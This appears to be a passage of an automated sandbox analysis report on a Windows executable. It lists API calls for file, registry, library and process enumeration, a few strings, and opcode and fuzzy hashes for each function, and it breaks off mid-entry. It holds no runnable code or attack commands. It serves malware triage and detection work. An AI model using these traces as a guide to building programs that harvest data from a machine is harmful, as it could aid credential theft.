                                • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@mallocmemcpy
                                • String ID:
                                • API String ID: 3831604043-0
                                • Opcode ID: a85243c3274abcf257bc8a1d0c36c9fb31ec9b9764bc30e3ac6d524e65cdc455
                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                • Opcode Fuzzy Hash: a85243c3274abcf257bc8a1d0c36c9fb31ec9b9764bc30e3ac6d524e65cdc455
                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                • GetLastError.KERNEL32 ref: 004175A2
                                • GetLastError.KERNEL32 ref: 004175A8
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ErrorLast$FilePointer
                                • String ID:
                                • API String ID: 1156039329-0
                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • failed memory resize %u to %u bytes, xrefs: 00415358
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: realloc
                                • String ID: failed memory resize %u to %u bytes
                                • API String ID: 471065373-2134078882
                                • Opcode ID: 3434da1dbcbe40749f7bb19bb969ba9348cca2f332a45bcd3c57ad1b142d0162
                                • Instruction ID: fa0be88ae63bf8e7a0ec1cbb838f3bc130d20eb0a75070b99cf9e4f37552e13a
                                • Opcode Fuzzy Hash: 3434da1dbcbe40749f7bb19bb969ba9348cca2f332a45bcd3c57ad1b142d0162
                                • Instruction Fuzzy Hash: 6EF05CB3A01705E7D2109A55DC418CBF3DCDFC0755B06082FF998D3201E168E88083B6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                • Opcode Fuzzy Hash: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset
                                • String ID: BINARY
                                • API String ID: 2221118986-907554435
                                • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                • FindCloseChangeNotification.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                  • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                  • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                • String ID:
                                • API String ID: 1161345128-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _wcsicmp
                                • String ID: /stext
                                • API String ID: 2081463915-3817206916
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                • String ID:
                                • API String ID: 159017214-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: malloc
                                • String ID: failed to allocate %u bytes of memory
                                • API String ID: 2803490479-1168259600
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcmpmemset
                                • String ID:
                                • API String ID: 1065087418-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                  • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                  • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: File$Time$CloseCompareCreateHandlememset
                                • String ID:
                                • API String ID: 2154303073-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 3150196962-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: PrivateProfile$StringWrite_itowmemset
                                • String ID:
                                • API String ID: 4232544981-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$FileModuleName
                                • String ID:
                                • API String ID: 3859505661-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                • API String ID: 3934441357-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 0d059ad067989d1f17bbe0e8521da585270b5c486309d81f35087ee814750848
                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                • Opcode Fuzzy Hash: 0d059ad067989d1f17bbe0e8521da585270b5c486309d81f35087ee814750848
                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: EnumNamesResource
                                • String ID:
                                • API String ID: 3334572018-0
                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
